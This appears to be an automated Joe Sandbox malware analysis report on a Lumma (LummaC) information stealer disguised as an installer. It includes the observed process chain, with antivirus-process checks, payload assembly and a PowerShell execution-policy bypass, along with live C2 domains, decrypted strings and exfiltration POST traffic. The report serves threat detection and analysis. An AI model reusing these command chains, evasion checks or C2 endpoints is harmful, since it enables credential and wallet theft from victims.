Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Full-Setup.exe

Overview

General Information

Sample name:Full-Setup.exe
Analysis ID:1579282
MD5:8f260f06588b4b171caa42f66929d9a6
SHA1:c3632bec197bf268b7ee2cd7a709691f8a35a61a
SHA256:a8d6e59a8f43bdcfad4de075ebc483aeda53c0ebbc59332d84663591adaeaa03
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Drops PE files with a suspicious file extension
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Copy From or To System Directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Full-Setup.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\Full-Setup.exe" MD5: 8F260F06588B4B171CAA42F66929D9A6)
    • cmd.exe (PID: 7364 cmdline: "C:\Windows\System32\cmd.exe" /c copy Spare Spare.cmd && Spare.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7424 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7432 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7468 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7476 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7512 cmdline: cmd /c md 600044 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7536 cmdline: findstr /V "Mary" Exploring MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7552 cmdline: cmd /c copy /b ..\Cancel + ..\Mag + ..\Investment + ..\Pee + ..\Condition + ..\Shopzilla + ..\Mention k MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Glow.com (PID: 7576 cmdline: Glow.com k MD5: 62D09F076E6E0240548C2F837536A46A)
        • powershell.exe (PID: 8088 cmdline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 7592 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["deafeninggeh.biz", "immureprech.biz", "diffuculttan.xyz", "effecterectz.xyz", "wrathful-jammy.cyou", "awake-weaves.cyou", "sordid-snaked.cyou", "debonairnukk.xyz", "kitteprincv.click"], "Build id": "eHdy4--p"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

        System Summary

        barindex
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Glow.com k, ParentImage: C:\Users\user\AppData\Local\Temp\600044\Glow.com, ParentProcessId: 7576, ParentProcessName: Glow.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1", ProcessId: 8088, ProcessName: powershell.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Glow.com k, ParentImage: C:\Users\user\AppData\Local\Temp\600044\Glow.com, ParentProcessId: 7576, ParentProcessName: Glow.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1", ProcessId: 8088, ProcessName: powershell.exe
        Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Glow.com k, ParentImage: C:\Users\user\AppData\Local\Temp\600044\Glow.com, ParentProcessId: 7576, ParentProcessName: Glow.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1", ProcessId: 8088, ProcessName: powershell.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Spare Spare.cmd && Spare.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Spare Spare.cmd && Spare.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Full-Setup.exe", ParentImage: C:\Users\user\Desktop\Full-Setup.exe, ParentProcessId: 7312, ParentProcessName: Full-Setup.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Spare Spare.cmd && Spare.cmd, ProcessId: 7364, ProcessName: cmd.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Glow.com k, ParentImage: C:\Users\user\AppData\Local\Temp\600044\Glow.com, ParentProcessId: 7576, ParentProcessName: Glow.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1", ProcessId: 8088, ProcessName: powershell.exe

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Spare Spare.cmd && Spare.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7364, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7476, ProcessName: findstr.exe
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-21T13:02:07.212650+010020283713Unknown Traffic192.168.2.449738104.21.43.127443TCP
        2024-12-21T13:02:09.519860+010020283713Unknown Traffic192.168.2.449739104.21.43.127443TCP
        2024-12-21T13:02:11.827348+010020283713Unknown Traffic192.168.2.449740104.21.43.127443TCP
        2024-12-21T13:02:14.357082+010020283713Unknown Traffic192.168.2.449741104.21.43.127443TCP
        2024-12-21T13:02:16.534303+010020283713Unknown Traffic192.168.2.449743104.21.43.127443TCP
        2024-12-21T13:02:19.211420+010020283713Unknown Traffic192.168.2.449750104.21.43.127443TCP
        2024-12-21T13:02:21.642694+010020283713Unknown Traffic192.168.2.449756104.21.43.127443TCP
        2024-12-21T13:02:25.113484+010020283713Unknown Traffic192.168.2.449767104.21.43.127443TCP
        2024-12-21T13:02:27.255557+010020283713Unknown Traffic192.168.2.449773104.26.3.16443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-21T13:02:08.245697+010020546531A Network Trojan was detected192.168.2.449738104.21.43.127443TCP
        2024-12-21T13:02:10.293340+010020546531A Network Trojan was detected192.168.2.449739104.21.43.127443TCP
        2024-12-21T13:02:25.896219+010020546531A Network Trojan was detected192.168.2.449767104.21.43.127443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-21T13:02:08.245697+010020498361A Network Trojan was detected192.168.2.449738104.21.43.127443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-21T13:02:10.293340+010020498121A Network Trojan was detected192.168.2.449739104.21.43.127443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-21T13:02:19.966107+010020480941Malware Command and Control Activity Detected192.168.2.449750104.21.43.127443TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["deafeninggeh.biz", "immureprech.biz", "diffuculttan.xyz", "effecterectz.xyz", "wrathful-jammy.cyou", "awake-weaves.cyou", "sordid-snaked.cyou", "debonairnukk.xyz", "kitteprincv.click"], "Build id": "eHdy4--p"}
        Source: Full-Setup.exeVirustotal: Detection: 59%Perma Link
        Source: Full-Setup.exeReversingLabs: Detection: 57%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 91.9% probability
        Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
        Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmpString decryptor: awake-weaves.cyou
        Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmpString decryptor: wrathful-jammy.cyou
        Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmpString decryptor: debonairnukk.xyz
        Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmpString decryptor: diffuculttan.xyz
        Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmpString decryptor: effecterectz.xyz
        Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmpString decryptor: deafeninggeh.biz
        Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmpString decryptor: immureprech.biz
        Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmpString decryptor: kitteprincv.click
        Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
        Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
        Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
        Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
        Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmpString decryptor: Workgroup: -
        Source: 0000000A.00000003.2150817399.0000000004891000.00000004.00000800.00020000.00000000.sdmpString decryptor: eHdy4--p
        Source: Full-Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49738 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49739 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49740 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49741 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49743 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49750 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49756 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.43.127:443 -> 192.168.2.4:49767 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.4:49773 version: TLS 1.2
        Source: Full-Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\Full-Setup.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
        Source: C:\Users\user\Desktop\Full-Setup.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003EDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_003EDC54
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003FA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_003FA087
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003FA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_003FA1E2
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003EE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_003EE472
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003FA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_003FA570
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003BC622 FindFirstFileExW,10_2_003BC622
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003F66DC FindFirstFileW,FindNextFileW,FindClose,10_2_003F66DC
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003F7333 FindFirstFileW,FindClose,10_2_003F7333
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003F73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_003F73D4
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003ED921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_003ED921
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\600044Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\600044\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49738 -> 104.21.43.127:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 104.21.43.127:443
        Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49750 -> 104.21.43.127:443
        Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49739 -> 104.21.43.127:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 104.21.43.127:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49767 -> 104.21.43.127:443
        Source: Malware configuration extractorURLs: deafeninggeh.biz
        Source: Malware configuration extractorURLs: immureprech.biz
        Source: Malware configuration extractorURLs: diffuculttan.xyz
        Source: Malware configuration extractorURLs: effecterectz.xyz
        Source: Malware configuration extractorURLs: wrathful-jammy.cyou
        Source: Malware configuration extractorURLs: awake-weaves.cyou
        Source: Malware configuration extractorURLs: sordid-snaked.cyou
        Source: Malware configuration extractorURLs: debonairnukk.xyz
        Source: Malware configuration extractorURLs: kitteprincv.click
        Source: unknownDNS query: name: rentry.co
        Source: Joe Sandbox ViewIP Address: 104.26.3.16 104.26.3.16
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.43.127:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.43.127:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.43.127:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 104.21.43.127:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.43.127:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.43.127:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49767 -> 104.21.43.127:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49756 -> 104.21.43.127:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49773 -> 104.26.3.16:443
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: kitteprincv.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 50Host: kitteprincv.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OCX7VZAWZQ7KITFAT1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18166Host: kitteprincv.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3OQHAZ4VLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8733Host: kitteprincv.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=V7Y3TEP1KG1POUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20410Host: kitteprincv.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=O6H956YO93QCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1226Host: kitteprincv.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UZIPRQST3O1RGOF8RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 553517Host: kitteprincv.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 85Host: kitteprincv.click
        Source: global trafficHTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Users\user\AppData\Local\Temp\600044\Glow.comCode function: 10_2_003FD889 InternetReadFile,SetEvent,GetLastError,SetEvent,10_2_003FD889
        Source: global trafficHTTP traffic detected: GET /feouewe5/raw HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: rentry.co
        Source: global trafficDNS traffic detected: DNS query: xXgzCMWHdyLHsXMFRfKCaRHugg.xXgzCMWHdyLHsXMFRfKCaRHugg
        Source: global trafficDNS traffic detected: DNS query: kitteprincv.click
        Source: global trafficDNS traffic detected: DNS query: rentry.co
        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: kitteprincv.click
        Source: Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
        Source: Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
        Source: Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
        Source: Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
        Source: Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
        Source: Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
        Source: Glow.com, 0000000A.00000003.2164760274.0000000004F33000.00000004.00000800.00020000.00000000.sdmp, Glow.com.1.dr, Environments.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
        Source: powershell.exe, 0000000F.00000002.2394229441.0000000003066000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microvr
        Source: Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
